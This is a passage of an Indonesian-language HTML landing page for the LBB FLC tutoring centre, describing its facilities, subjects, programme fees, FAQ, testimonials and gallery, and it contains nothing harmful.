<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="utf-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="viewport" content="width=device-width, initial-scale=1">
<!-- The above 3 meta tags *must* come first in the head; any other head content must come *after* these tags -->
<title>LBB FLC (Fun Learning Course)</title>
<!-- Bootstrap CSS -->
<link href="assets/bootstrap/css/bootstrap.min.css" rel="stylesheet">
<!-- Font Awesome CSS-->
<link href="assets/font-awesome/css/font-awesome.min.css" rel="stylesheet">
<!-- Custom CSS -->
<link href="css/style.css" rel="stylesheet">
<!-- Animate CSS -->
<link href="assets/animate/animate.css" rel="stylesheet">
<!-- Owl Carousel -->
<link href="assets/owl-carousel/css/owl.carousel.css" rel="stylesheet">
<link href="assets/owl-carousel/css/owl.theme.css" rel="stylesheet">
<!-- Favicon -->
<link rel="shortcut icon" type="image/x-icon" href="images/LOGO-FLC.png">
<!-- HTML5 shim and Respond.js for IE8 support of HTML5 elements and media queries -->
<!-- WARNING: Respond.js doesn't work if you view the page via file:// -->
<!--[if lt IE 9]>
      <script src="https://oss.maxcdn.com/html5shiv/3.7.3/html5shiv.min.js"></script>
      <script src="https://oss.maxcdn.com/respond/1.4.2/respond.min.js"></script>
    <![endif]-->
</head>
<body id="home">
<!-- Pre Loader -->
<div id="dvLoading"></div>
<!-- Header Start -->
<header>
  <div class="top-wrapper hidden-sm hidden-xs">
    <div class="container">
      <div class="row">
        <div class="col-sm-7">
          <ul class="header-contact-info">
            <li> <i class="fa fa-phone" aria-hidden="true"></i> +62-856-0123-4399 &nbsp; | &nbsp;<i class="fa fa-clock-o" aria-hidden="true"></i>Buka Setiap Hari Pukul 14.00-21.00 WIB</li>
            <!-- <li><i class="fa fa-envelope" aria-hidden="true"></i> <a href="mailto:support@sbtechnosoft.com">support@sbtechnosoft.com</a></li> -->
          </ul>
        </div>
        <div class="col-sm-5">
          <div class="pull-right">
            <!-- <ul>
              Login
              <li class="login"><a href="javascript:void(0)"><i class="fa fa-lock"></i>Login</a>
                <div class="login-form">
                  <h4>Login</h4>
                  <form action="#" method="post">
                    <input type="text" name="name" placeholder="Username">
                    <input type="password" name="password" placeholder="Password">
                    <button type="submit" class="btn">Login</button>
                  </form>
                </div>
              </li>
              Register
              <li class="register"><a href="javascript:void(0)"><i class="fa fa-user-o" aria-hidden="true"></i>Sign Up</a>
                <div class="register-form">
                  <h4>Sign Up</h4>
                  <span>Please sign up the account</span>
                  <form action="#" method="post">
                    <input type="text" name="user-name" placeholder="Username">
                    <input type="email" name="user-email" placeholder="Email">
                    <input type="password" name="user-password" placeholder="Password">
                    <button type="submit" class="btn">Register</button>
                  </form>
                </div>
              </li>
            </ul> -->
            <ul class="header-social-icons">
              <li class="facebook"><a href="javascript:void(0)" target="https://plus.google.com/110799669550840595037"><i class="fa fa-google-plus"></i></a></li>
              <li class="twitter"><a href="javascript:void(0)" target="https://www.facebook.com/Bimbel.FLC.Mojokerto/"><i class="fa fa-facebook"></i></a></li>
              <!-- <li class="pinterest"><a href="javascript:void(0)" target="_blank"><i class="fa fa-pinterest"></i></a></li>
              <li class="youtube"><a href="javascript:void(0)" target="_blank"><i class="fa fa-youtube"></i></a></li> -->
            </ul>
          </div>
        </div>
      </div>
    </div>
  </div>
  <div class="logo-bar wow fadeInDown" data-offset-top="197" data-spy="affix">
    <div class="container"> 
      <!-- Logo -->
      <div class="row">
        <div class="col-sm-4 hidden-xs"><a href="index.html"> <img src="images/LOGO-FLC.png" style="width: 20%" alt="LBB FLC JOMBANG"></a> </div>
        <div class="col-sm-8">
          <nav class="navbar navbar-default">
            <div class="row"> 
              <!-- Brand and toggle get grouped for better mobile display -->
              <div class="navbar-header">
                <button type="button" class="navbar-toggle collapsed" data-toggle="collapse" data-target="#bs-example-navbar-collapse-1" aria-expanded="false"> <span class="sr-only">Toggle navigation</span> <span class="icon-bar"></span> <span class="icon-bar"></span> <span class="icon-bar"></span> </button>
                <a class="navbar-brand" style="width: 200px" href="#home"><img src="images/LOGO-FLC.png" style="width: 40%" alt="LBB FLC JOMBANG"/></a> </div>
              <!-- Collect the nav links, forms, and other content for toggling -->
              <div class="collapse navbar-collapse" id="bs-example-navbar-collapse-1">
                <ul class="nav navbar-nav">
                  <li class="page-scroll"><a href="#home">Home</a></li>
                  <li class="page-scroll"><a href="#fasilitas">Fasilitas</a></li>
                  <li class="page-scroll"><a href="#mapel">Mata Pelajaran</a></li>
                  <!-- <li class="page-scroll"><a href="#teame">Team</a></li> -->
                  <li class="page-scroll"><a href="#program">Program</a></li>
                  <li class="page-scroll"><a href="#testimoni">Testimoni</a></li>
                  <li class="page-scroll"><a href="#galeri">Galeri</a></li>
                  <li class="page-scroll"><a href="#tentang">Tentang</a></li>
                </ul>
              </div>
              <!-- /.navbar-collapse --> 
            </div>
            <!-- /.container --> 
          </nav>
        </div>
      </div>
    </div>
  </div>
  <!-- Banner Wrapper Start -->
  <div class="banner-wrapper">
    <div class="carousel fade-carousel slide" data-ride="carousel" data-interval="4000" id="bs-carousel"> 
      <!-- Overlay -->
      <div class="overlay"></div>
      <!-- Indicators -->
      <ol class="carousel-indicators">
        <li data-target="#bs-carousel" data-slide-to="0" class="active"></li>
        <li data-target="#bs-carousel" data-slide-to="1"></li>
        <li data-target="#bs-carousel" data-slide-to="2"></li>
      </ol>
      <!-- Wrapper for slides -->
      <div class="carousel-inner">
        <div class="item slides active">
          <div class="slide-1"></div>
          <div class="hero">
            <h1 class="animated1">Banyak Program Menarik<br>
              <span>Reguler - Semi Privat - Privat</span></h1>
            <h3 class="animated2">Kami menyediakan berbagai program sesuai dengan kebutuhan siswa, yang mana tujuan utamanya adalah tetap untuk Mencerdaskan Generasi Bangsa seperti Motto kami</h3>
            <span class="page-scroll"><a class="animated3" href="#program">Selengkapnya <i class="fa fa-caret-right" aria-hidden="true"></i></a></span>
          </div>
        </div>
        <div class="item slides">
          <div class="slide-2"></div>
          <div class="hero">
            <h1 class="animated1">Fasilitas Lengkap<br>
              <span>Fasilitas Penunjang Pembelajaran</span></h1>
            <h3 class="animated2">Kami menyediakan berbagai fasilitas yang akan dapat menunjang dalam semua proses pembelajaran, baik fasilitas fisik maupun materi</h3>
            <span class="page-scroll"><a class="animated3" href="#fasilitas">Selengkapnya <i class="fa fa-caret-right" aria-hidden="true"></i></a></span>
          </div>
        </div>
        <div class="item slides">
          <div class="slide-3"></div>
          <div class="hero">
            <h1 class="animated1">Penghargaan Prestasi<br>
              <span>Perhargaan Untuk Memotivasi Belajar</span></h1>
            <h3 class="animated2">Pemberian penghargaan sangatlah penting, karena dengan cara ini terciptalah sebuah konpetisi yang bisa dijadikan pemicu untuk selalu belajar lebih giat lagi</h3>
            <span class="page-scroll"><a class="animated3" href="#galeri">Selengkapnya <i class="fa fa-caret-right" aria-hidden="true"></i></a></span>
          </div>
        </div>
      </div>
      <a class="left carousel-control" href="#bs-carousel" data-slide="prev"><span class="transition3s glyphicon glyphicon-chevron-left fa fa-angle-left"></span></a> <a class="right carousel-control" href="#bs-carousel" data-slide="next"><span class="transition3s glyphicon glyphicon-chevron-right fa fa-angle-right"></span></a> </div>
  </div>
  <!-- Banner Wrapper End --> 
</header>
<!-- Header End --> 
<!-- About Us -->
<section id="fasilitas" class="about-us">
  <div class="container">
    <div class="row">
      <div class="col-sm-12 col-md-3">
        <h2><span>Fasilitas</span><br>
        	Yang Didapat
          </h2>
      </div>
      <div class="col-sm-12 col-md-9">
        <p><strong>Fasilitas,</strong> berbagai fasilitas yang akan didapat siswa saat mengikuti <span  class="page-scroll"><a href="#program"><i style="color: red"><b>program</b></i></a></span> yang ada di LBB FLC (Fun Learning Course), pastikan anda mendaftar dalam program les untuk menikmati segala fasilitas dan kemudahan yang kami tawarkan</p>
      </div>
      <!-- <div class="col-sm-12 col-md-3 pull-right hidden-sm"> <img src="images/about-img.jpg" alt="Education World"> </div> -->
    </div>
    <div class="about-callouts">
      <div class="row">
        <div class="col-sm-4 callout">
          <div class="row">
            <!-- <div class="col-sm-12 col-md-3 icon"><img src="images/vision-icon.jpg" alt="Education World"> </div> -->
            <div class="col-sm-12 col-md-3 icon"><img src="images/icon/worksheet.png" alt="LBB FLC"> </div>
            <div class="col-sm-12 col-md-9 cnt">
              <h3>Worksheet</h3>
              <p>Lembar kerja siswa yang diberikan tiap pertemuan, disesuaikan dengan kurikulum terbaru (<i>up to date</i>)</p>
            </div>
          </div>
        </div>
        <div class="col-sm-4 callout">
          <div class="row">
            <div class="col-sm-12 col-md-3 icon"> <img src="images/icon/shoolarship.png" alt="Education World"></div>
            <div class="col-sm-12 col-md-9 cnt">
              <h3>Schoolarship</h3>
              <p>Beasiswa khusus bagi siswa yatim/ yatim piatu dengan memberikan diskon 50% dari biaya program</p>
            </div>
          </div>
        </div>
        <div class="col-sm-4 callout">
          <div class="row">
            <div class="col-sm-12 col-md-3 icon"><img src="images/icon/konsis.png" alt="Education World" width="49" height="59"> </div>
            <div class="col-sm-12 col-md-9 cnt">
              <h3>Konsis</h3>
              <p>Konsultasi tugas / PR siswa setiap hari diluar les dan bisa berupa pelajaran tambahan</p>
            </div>
          </div>
        </div>
        <!-- 2 -->
        <div class="col-sm-4 callout">
          <div class="row">
            <div class="col-sm-12 col-md-3 icon"> <img src="images/icon/fp.png" alt="Education World" width="49" height="59"></div>
            <div class="col-sm-12 col-md-9 cnt">
              <h3>Follow Up & Parenting</h3>
              <p>Komunikasi dua arah antara staff dan orang tua mengenai perkembangan hasil belajar siswa</p>
            </div>
          </div>
        </div>
        <div class="col-sm-4 callout">
          <div class="row">
            <div class="col-sm-12 col-md-3 icon"> <img src="images/icon/bukumaster.png" alt="Education World" width="49" height="59"></div>
            <div class="col-sm-12 col-md-9 cnt">
              <h3>Buku The Master</h3>
              <p>Disusun sesuai kurikulum yang terbaru, berisi ringkasan materi & latihan soal</p>
            </div>
          </div>
        </div>
        <div class="col-sm-4 callout">
          <div class="row">
            <div class="col-sm-12 col-md-3 icon"> <img src="images/icon/eval.png" alt="Education World" width="49" height="59"></div>
            <div class="col-sm-12 col-md-9 cnt">
              <h3>Integrated Evaluation</h3>
              <p>Pernilaian terpadu untuk mengetahui perkembangan hasil belajar siswa dilakukan secara terprogram tiap akhir bab</p>
            </div>
          </div>
        </div>
        <!-- 3 -->
        <div class="col-sm-4 callout">
          <div class="row">
            <div class="col-sm-12 col-md-3 icon"> <img src="images/icon/calculation.png" alt="Education World" width="49" height="59"></div>
            <div class="col-sm-12 col-md-9 cnt">
              <h3>Rumus Top</h3>
              <p>Rumus cepat menyelesaikan soal dalam waktu singkat & trik khusus menghafal</p>
            </div>
          </div>
        </div>
        <div class="col-sm-4 callout">
          <div class="row">
            <div class="col-sm-12 col-md-3 icon"> <img src="images/icon/connn.png" alt="Education World" width="49" height="59"></div>
            <div class="col-sm-12 col-md-9 cnt">
              <h3>Connection Book</h3>
              <p>Buku penghubung antara orang tua dan tentor untuk memantau perkembangan belajar siswa</p>
            </div>
          </div>
        </div>
        <div class="col-sm-4 callout">
          <div class="row">
            <div class="col-sm-12 col-md-3 icon"> <img src="images/icon/nyaman.png" alt="Education World" width="49" height="59"></div>
            <div class="col-sm-12 col-md-9 cnt">
              <h3>Ruang Belajar Nyaman </h3>
              <p>Ruang belajar sejuk dan nyaman untuk menunjang kegiatan belajar mengajar</p>
            </div>
          </div>
        </div>
        <!-- 4 -->
        <div class="col-sm-4 callout">
          <div class="row">
            <div class="col-sm-12 col-md-3 icon"> <img src="images/icon/book.png" alt="Education World" width="49" height="59"></div>
            <div class="col-sm-12 col-md-9 cnt">
              <h3>Academic Report</h3>
              <p>Raport siswa yang diberikan tiap akhir semester</p>
            </div>
          </div>
        </div>
        <div class="col-sm-4 callout">
          <div class="row">
            <div class="col-sm-12 col-md-3 icon"> <img src="images/icon/delivery-man.png" alt="Education World" width="49" height="59"></div>
            <div class="col-sm-12 col-md-9 cnt">
              <h3>Delivery Registration</h3>
              <p>Jemputan pendaftaran siswa baru yang bisa dilayani dirumah siswa</p>
            </div>
          </div>
        </div>
        <div class="col-sm-4 callout">
          <div class="row">
            <div class="col-sm-12 col-md-3 icon"> <img src="images/icon/konsis.png" alt="Education World" width="49" height="59"></div>
            <div class="col-sm-12 col-md-9 cnt">
              <h3>Konsultasi Online</h3>
              <p>Pendampingan dan bimbingan secara online oleh pengajar yang profesional</p>
            </div>
          </div>
        </div>
        <!-- 5 -->
        <div class="col-sm-6 callout">
          <div class="row">
            <div class="col-sm-12 col-md-3 icon"> <img src="images/icon/worksheet.png" alt="Education World" width="49" height="59"></div>
            <div class="col-sm-12 col-md-9 cnt">
              <h3>Integrated Try Out</h3>
              <p>Bertujuan melatih siswa mengerjakan soal-soal UN, USM, & SBMPTN</p>
            </div>
          </div>
        </div>
        <div class="col-sm-6 callout">
          <div class="row">
            <div class="col-sm-12 col-md-3 icon"> <img src="images/icon/shapes.png" alt="Education World" width="49" height="59"></div>
            <div class="col-sm-12 col-md-9 cnt">
              <h3>Insurance</h3>
              <p>Khusus siswa yang membayar lunas 1 tahun bisa menikmati fasilitas asuransi kesehatan & kecelakaan GRATIS</p>
            </div>
          </div>
        </div>
      </div>
    </div>
  </div>
</section>
<!-- About Us End--> 
<!-- mapel -->
<link href="https://fonts.googleapis.com/icon?family=Material+Icons" rel="stylesheet">
<section id="mapel" class="courses">
  <div class="container">
    <h2>Tersedia Untuk<br>
      <span>Mata Pelajaran</span></h2>
    <div id="owl-demo" class="owl-carousel owl-theme">
      <div class="item course-list">
        <div class="heading-icon">
          <div class="icon"><i class="material-icons" aria-hidden="true">filter_1</i></div>
          <h3>TK A + B</h3>
        </div>
        <div class="course-cnt">
          <ul>
          	<li>- Membaca</li>
          	<li>- Menulis</li>
          	<li>- Menghitung</li>
          	<li>- Mewarnai</li>
          	<li>- Origami</li>
          </ul>
        </div>
      </div>
      <div class="item course-list">
        <div class="heading-icon">
          <div class="icon"><i class="material-icons" aria-hidden="true">filter_2</i></div>
          <h3>1 - 6 SD Sederajat</h3>
        </div>
        <div class="course-cnt">
          <ul style="list-style-type:none;">
          	<li>- Matematika</li>
          	<li>- IPA (Ilmu Pengetahuan Alam)</li>
          	<li>- IPS (Ilmu Pengetahuan Sosial)</li>
          	<li>- Bahasa Inggris</li>
          	<li>- Bahasa Indonesia</li>
          </ul>
        </div>
      </div>
      <div class="item course-list">
        <div class="heading-icon">
          <div class="icon"><i class="material-icons" aria-hidden="true">filter_3</i></div>
          <h3>7 - 9 SMP Sederajat</h3>
        </div>
        <div class="course-cnt">
          <ul style="list-style-type:none;">
          	<li>- Matematika</li>
          	<li>- IPA (Ilmu Pengetahuan Alam)</li>
          	<li>- Bahasa Inggris</li>
          	<li>- Bahasa Indonesia</li>
          </ul>
        </div>
      </div>
      <div class="item course-list">
        <div class="heading-icon">
          <div class="icon"><i class="material-icons" aria-hidden="true">filter_4</i></div>
          <h3>10 - 12 SMK</h3>
        </div>
        <div class="course-cnt">
          <ul style="list-style-type:none;">
          	<li>- Matematika</li>
          	<li>- Bahasa Inggris</li>
          	<li>- Bahasa Indonesia</li>
          	<li>- Kejuruan</li>
          </ul>
        </div>
      </div>
      <div class="item course-list">
        <div class="heading-icon">
          <div class="icon"><i class="material-icons" aria-hidden="true">filter_5</i></div>
          <h3>10 - 12 SMA/MA (IPA)</h3>
        </div>
        <div class="course-cnt">
          <ul style="list-style-type:none;">
          	<li>- Matematika</li>
          	<li>- Fisika</li>
          	<li>- Kimia</li>
          	<li>- Bahasa Inggris</li>
          	<li>- Bahasa Indonesia</li>
          </ul>
        </div>
      </div>
      <div class="item course-list">
        <div class="heading-icon">
          <div class="icon"><i class="material-icons" aria-hidden="true">filter_6</i></div>
          <h3>UMUM</h3>
        </div>
        <div class="course-cnt">
          <ul style="list-style-type:none;">
          	<li>- TPA</li>
          	<li>- Matematika</li>
          	<li>- Bahasa Inggris</li>
          	<li>- Bahasa Jepang</li>
          	<li>- Bahasa Jerman</li>
          	<li>- Komputer</li>
          </ul>
        </div>
      </div>
    </div>
  </div>
</section>
<!-- Courses End --> 
<!-- team Start -->
<!-- <section id="teame" class="faculty">
  <div class="container">
    <h2>Successful<br>
      <span>Faculty Team</span></h2>
    <div id="team" class="owl-carousel owl-theme">
      <div class="item">
        <div class="img-box"> <img src="images/team-img1.jpg" alt="Team1" title="Team1" width="400" height="600" />
          <div class="text-center">
            <h4>Sarah Norris</h4>
            <p>Lorem Ipsum is simply dummy text of the printing and typesetting industry.</p>
          </div>
        </div>
      </div>
      <div class="item">
        <div class="img-box"> <img src="images/team-img2.jpg" alt="Team2" title="Team2" />
          <div class="text-center">
            <h4>Doris Wilson</h4>
            <p>Lorem Ipsum is simply dummy text of the printing and typesetting industry.</p>
          </div>
        </div>
      </div>
      <div class="item">
        <div class="img-box"> <img src="images/team-img3.jpg" alt="Team3" title="Team3" />
          <div class="text-center">
            <h4>Anne Kemper</h4>
            <p>Lorem Ipsum is simply dummy text of the printing and typesetting industry.</p>
          </div>
        </div>
      </div>
      <div class="item">
        <div class="img-box"> <img src="images/team-img4.jpg" alt="Team4" title="Team4" />
          <div class="text-center">
            <h4>Ruth Carman</h4>
            <p>Lorem Ipsum is simply dummy text of the printing and typesetting industry.</p>
          </div>
        </div>
      </div>
      <div class="item">
        <div class="img-box"> <img src="images/team-img1.jpg" alt="Team1" title="Team1" />
          <div class="text-center">
            <h4>Sarah Norris</h4>
            <p>Lorem Ipsum is simply dummy text of the printing and typesetting industry.</p>
          </div>
        </div>
      </div>
      <div class="item">
        <div class="img-box"> <img src="images/team-img2.jpg" alt="Team2" title="Team2" />
          <div class="text-center">
            <h4>Doris Wilson</h4>
            <p>Lorem Ipsum is simply dummy text of the printing and typesetting industry.</p>
          </div>
        </div>
      </div>
      <div class="item">
        <div class="img-box"> <img src="images/team-img3.jpg" alt="Team3" title="Team3" />
          <div class="text-center">
            <h4>Anne Kemper</h4>
            <p>Lorem Ipsum is simply dummy text of the printing and typesetting industry.</p>
          </div>
        </div>
      </div>
      <div class="item">
        <div class="img-box"> <img src="images/team-img4.jpg" alt="Team4" title="Team4" />
          <div class="text-center">
            <h4>Ruth Carman</h4>
            <p>Lorem Ipsum is simply dummy text of the printing and typesetting industry.</p>
          </div>
        </div>
      </div>
    </div>
  </div>
</section> -->
<!-- Faculty End --> 
<!-- testimoni Start -->
<section id="program" class="testimonials">
  <div class="container">
    <h2>Open Now<br>
      <span>Program</span></h2>
    <div class="tab-panel">
      <ul class="nav nav-tabs ">
        <li class="active"> <a href="#tab_default_1" data-toggle="tab">Reguler</a> </li>
        <li> <a href="#tab_default_2" data-toggle="tab">Semi Privat</a> </li>
        <li> <a href="#tab_default_3" data-toggle="tab">Privat</a> </li>
      </ul>
      <div class="tab-content">
        <div class="tab-pane active" id="tab_default_1">
          <div class="row contactus">
		      <div class="col-sm-4">
		        <div class="contact-list" style="min-height: 10px">
		          <!-- <div class="center">
		            <div class="contact-icon"><i class="fa fa-map-marker"></i></div>
		          </div> --> <br>
		          <h3>Syarat Pendaftaran</h3>
		          <h4><span style="color: green">&#10004; </span>Mengisi formulir pendaftaran</h4>
		          <h4><span style="color: green">&#10004; </span>Membayar biaya registrasi Rp. 50.000</h4>
		          <h4><span style="color: green">&#10004; </span>Eks. Siswa FLC Rp. 30.000</h4> <br>
		        </div>
		      </div>
		      <div class="col-sm-4">
		        <div class="contact-list" style="min-height: 10px">
		          <!-- <div class="center">
		            <div class="contact-icon"><i class="fa fa-phone"></i></div>
		          </div> --> <br>
		          <h3>Keunggulan Program Reguler</h3>
		          <h4><span style="color: green">&#10004; </span>Biaya sangat terjangkau</h4>
		          <h4><span style="color: green">&#10004; </span>Pembayaran perbulannya ringan</h4>
		          <h4><span style="color: green">&#10004; </span>Siswa mudah bersosialisasi dengan teman</h4> <br>
		        </div>
		      </div>
		      <div class="col-sm-4">
		        <div class="contact-list" style="min-height: 10px">
		          <!-- <div class="center">
		            <div class="contact-icon"><i class="fa fa-envelope"></i></div>
		          </div> --> <br>
		          <h3>Rincian Program Reguler</h3>
		          <h4><span style="color: green">&#10004; </span>Masuk 3x/minggu</h4>
		          <h4><span style="color: green">&#10004; </span>Perkelas hanya 10-16 siswa</h4>
		          <h4><span style="color: green">&#10004; </span>Biaya : 4.800/Pertemuan</h4> <br>
		        </div>
		      </div>
		  </div>
        </div>
        <div class="tab-pane" id="tab_default_2">
          <div class="row contactus">
		      <div class="col-sm-4">
		        <div class="contact-list" style="min-height: 10px">
		          <!-- <div class="center">
		            <div class="contact-icon"><i class="fa fa-map-marker"></i></div>
		          </div> --> <br>
		          <h3>Syarat Pendaftaran</h3>
		          <h4><span style="color: green">&#10004; </span>Mengisi formulir pendaftaran</h4>
		          <h4><span style="color: green">&#10004; </span>Membayar biaya registrasi Rp. 50.000</h4>
		          <h4><span style="color: green">&#10004; </span>Eks. Siswa FLC Rp. 30.000</h4> <br>
		        </div>
		      </div>
		      <div class="col-sm-4">
		        <div class="contact-list" style="min-height: 10px">
		          <!-- <div class="center">
		            <div class="contact-icon"><i class="fa fa-phone"></i></div>
		          </div> --> <br>
		          <h3>Keunggulan Program Semi-Privat</h3>
		          <h4><span style="color: green">&#10004; </span>Pembelajaran lebih fokun</h4>
		          <h4><span style="color: green">&#10004; </span>Menghemat waktu siswa</h4>
		          <h4><span style="color: green">&#10004; </span>Jadwal lebih fleksibel</h4>
		          <h4><span style="color: green">&#10004; </span>lebih cepat memahami pelajaran</h4>
		          <h4><span style="color: green">&#10004; </span>Siswa lebih aman karena tidak keluar rumah</h4> <br>
		        </div>
		      </div>
		      <div class="col-sm-4">
		        <div class="contact-list" style="min-height: 10px">
		          <!-- <div class="center">
		            <div class="contact-icon"><i class="fa fa-envelope"></i></div>
		          </div> --> <br>
		          <h3>Rincian Program Semi-Privat</h3>
		          <h4><span style="color: green">&#10004; </span>Masuk 2-6x/minggu </h4>
		          <h4><span style="color: green">&#10004; </span>Durasi per-pertemuan 90 menit</h4>
		          <h4><span style="color: green">&#10004; </span>Max 7 Siswa</h4> 
		          <h4><span style="color: green">&#10004; </span>Biaya: Rp. 41.000/TM</h4> 
		          <br>
		        </div>
		      </div>
		  </div>
        </div>
        <div class="tab-pane" id="tab_default_3">
          <div class="row contactus">
		      <div class="col-sm-4">
		        <div class="contact-list" style="min-height: 10px">
		          <!-- <div class="center">
		            <div class="contact-icon"><i class="fa fa-map-marker"></i></div>
		          </div> --> <br>
		          <h3>Syarat Pendaftaran</h3>
		          <h4><span style="color: green">&#10004; </span>Mengisi formulir pendaftaran</h4>
		          <h4><span style="color: green">&#10004; </span>Membayar biaya registrasi Rp. 50.000</h4>
		          <h4><span style="color: green">&#10004; </span>Eks. Siswa FLC Rp. 30.000</h4> <br>
		        </div>
		      </div>
		      <div class="col-sm-4">
		        <div class="contact-list" style="min-height: 10px">
		          <!-- <div class="center">
		            <div class="contact-icon"><i class="fa fa-phone"></i></div>
		          </div> --> <br>
		          <h3>Keunggulan Program Privat</h3>
		          <h4><span style="color: green">&#10004; </span>Pembelajaran lebih fokun</h4>
		          <h4><span style="color: green">&#10004; </span>Menghemat waktu siswa</h4>
		          <h4><span style="color: green">&#10004; </span>Jadwal lebih fleksibel</h4>
		          <h4><span style="color: green">&#10004; </span>lebih cepat memahami pelajaran</h4>
		          <h4><span style="color: green">&#10004; </span>Siswa lebih aman karena tidak keluar rumah</h4> <br>
		        </div>
		      </div>
		      <div class="col-sm-4">
		        <div class="contact-list" style="min-height: 10px">
		          <!-- <div class="center">
		            <div class="contact-icon"><i class="fa fa-envelope"></i></div>
		          </div> --> <br>
  		          <h3>Rincian Program Privat</h3>
		          <h4><span style="color: green">&#10004; </span>Masuk 2-6x/minggu </h4>
		          <h4><span style="color: green">&#10004; </span>Durasi per-pertemuan 90 menit</h4>
		          <h4><span style="color: green">&#10004; </span>1 Tentor Untuk 1 Siswa</h4> 
		          <h4><span style="color: green">&#10004; </span>Biaya: Rp. 33.000/TM</h4> 
		          <br>
		        </div>
		      </div>
		  </div>
        </div>
      </div>
    </div>
    <div id="accordion-first" class="clearfix">
	  <center>
	      <h3>Frequenly Ask Question (F.A.Q)</h3>
      </center>
      <div class="accordion" id="accordion1">
        <div class="accordion-group">
          <div class="accordion-heading"> <a class="accordion-toggle collapsed" data-toggle="collapse" data-parent="#accordion1" href="#collapseOne"> <em class="icon-fixed-width fa fa-plus"></em>Bagaimana Cara Mendaftar di LBB FLC? </a> </div>
          <div style="height: 0px;" id="collapseOne" class="accordion-body collapse">
            <div class="accordion-inner"> Untuk pendaftaran bisa langsung melalui SMS dengan cara, <br><br> ketik "DAFTAR_Nama-Sekolah_Kelas/Jurasan_Alamat". <br><br>Contoh: "DAFTAR_SMAN Jogoroto_12/IPA_Jombang Permai". <br><br>Lalu kirim ke 0856-0123-4399 </div>
          </div>
        </div>
        <div class="accordion-group">
          <div class="accordion-heading"> <a class="accordion-toggle collapsed" data-toggle="collapse" data-parent="#accordion1" href="#collapseTwo"> <em class="icon-fixed-width fa fa-plus"></em>Kenapa Harus Memilih LBB FLC? </a> </div>
          <div style="height: 0px;" id="collapseTwo" class="accordion-body collapse">
            <div class="accordion-inner"> Ada 3 alasan kenapa anda harus memilih LBB FLC: <br>
	            <ul style="list-style-type: none">
	            	<li>1. Biaya Terjangkau</li>
	            	<li>2. Telah sukses mengantar ribuan siswa ke SMP, SMA, PTN Favorit</li>
	            	<li>3. Berpengalaman lebih dari 6 tahun</li>
	            </ul> 
            </div>
          </div>
        </div>
        <div class="accordion-group">
          <div class="accordion-heading"> <a class="accordion-toggle collapsed" data-toggle="collapse" data-parent="#accordion1" href="#collapseThree"> <em class="icon-fixed-width fa fa-plus"></em>Adakah program yang selain program yang sudah disebutkan diatas? </a> </div>
          <div style="height: 0px;" id="collapseThree" class="accordion-body collapse">
            <div class="accordion-inner"> ADA, di LBB FLC ada namanya <b>PROGRAM JAMINAN(*)</b> untuk masuk PTN Favorit / SMA Favorit/ Lulus UN. (<span style="color: red">* Syarat & Ketentuan Belaku</span>)</div>
          </div>
        </div>
      </div>
      <!-- end accordion --> 
    </div>
  </div>
</section>
<!-- Testimonials End --> 
<!-- testimoni Start -->
<section id="testimoni" class="testimonials">
  <div class="container">
    <h2>Cek Testimoni<br>
      <span>Apa Kata Mereka</span></h2>
    <div class="tab-panel">
      <div class="testimonials-list owl-carousel owl-theme">
        <div class="item">
          <h4><strong>Ifa Harum S.</strong> Juara 1 MTK Se-Jatim 2016<br>
            <!-- <span>HR-Excutive in IBM Technologies from 2014</span></h4> -->
          <p>Les di Bimbel FLC sangat menyenangkan & menambah pengetahuan yang belum didapat Bimbel FLC OK banget..!!</p>
          <div class="tes-img"><img src="images/testimonials2.png" alt="Testimonial"></div>
        </div>
        <div class="item">
          <h4><strong>Rosita Sopwi</strong> Jurusan Kedokteran UNEJ<br>
            <!-- <span>HR-Excutive in IBM Technologies from 2014</span></h4> -->
          <p>Asyik belajar di FLC, nyaman, enak pokoknya, penyampaian materinya juga enak bikin nyambung</p>
          <div class="tes-img"><img src="images/testimonials2.png" alt="Testimonial"></div>
        </div>
        <div class="item">
          <h4><strong>Irsyadatun Ni'mah</strong> Jurusan Kimia UNM<br>
            <!-- <span>HR-Excutive in IBM Technologies from 2014</span></h4> -->
          <p>Belajar di FLC sangat enjoy & menyenangkan, rumus cepatnya gampang dihafal & diingat, Thanks FLC</p>
          <div class="tes-img"><img src="images/testimonials2.png" alt="Testimonial"></div>
        </div>
        <div class="item">
          <h4><strong>M Thohirin R</strong> Jurusan Kedokteran UNAIR<br>
            <!-- <span>UN SMA 2013 Terbaik se-JATIM</span></h4> -->
          <p>Seru, santai, menyenangkan & menejutkan sehingga bisa mengantarkan saya melanjutkan ke PTN, I Love You FLC...</p>
          <div class="tes-img"><img src="images/testimonials1.png" alt="Testimonial"></div>
        </div>
      </div>
    </div>
  </div>
</section>
<!-- Testimonials End --> 
<!-- galeri Start -->
<section id="galeri" class="gallery">
  <div class="container">
    <h2>Dokumentasi<br>
      <span>Galeri FLC</span></h2>
    <div class="gal-container">
      <div class="col-md-3 col-sm-6 co-xs-12 gal-item">
        <div class="box"> <a href="javascript:void(0)" data-toggle="modal" data-target="#1">
          <div class="caption">
            <h4>Grand Opening LBB FLC Trowulan</h4>
            <!-- <p>Lorem Ipsum is simply dummy text of the printing</p> -->
            <i class="fa fa-search" aria-hidden="true"></i> </div>
          <img src="images/grandopeningflctrowulan.jpg" alt="Gallery Image"> </a>
          <div class="modal fade" id="1" tabindex="-1" role="dialog">
            <div class="modal-dialog" role="document">
              <div class="modal-content">
                <button type="button" class="close" data-dismiss="modal" aria-label="Close"><span aria-hidden="true">×</span></button>
                <div class="modal-body"> <img src="images/grandopeningflctrowulan.jpg" alt="Gallery Image"> </div>
                <div class="col-md-12 description">
                  <h4>Grand Opening LBB FLC Trowulan</h4>
                </div>
              </div>
            </div>
          </div>
        </div>
      </div>
      <div class="col-md-3 col-sm-6 co-xs-12 gal-item">
        <div class="box"> <a href="javascript:void(0)" data-toggle="modal" data-target="#2">
          <div class="caption">
            <h4>Suasana Try Out se-Mojokerto - Jombang</h4>
            <!-- <p>Lorem Ipsum is simply dummy text of the printing</p> -->
            <i class="fa fa-search" aria-hidden="true"></i> </div>
          <img src="images/tryout3.jpg" alt="Gallery Image"> </a>
          <div class="modal fade" id="2" tabindex="-1" role="dialog">
            <div class="modal-dialog" role="document">
              <div class="modal-content">
                <button type="button" class="close" data-dismiss="modal" aria-label="Close"><span aria-hidden="true">×</span></button>
                <div class="modal-body"> <img src="images/tryout3.jpg" alt="Gallery Image"> </div>
                <div class="col-md-12 description">
                  <h4>Suasana Try Out se-Mojokerto - Jombang</h4>
                </div>
              </div>
            </div>
          </div>
        </div>
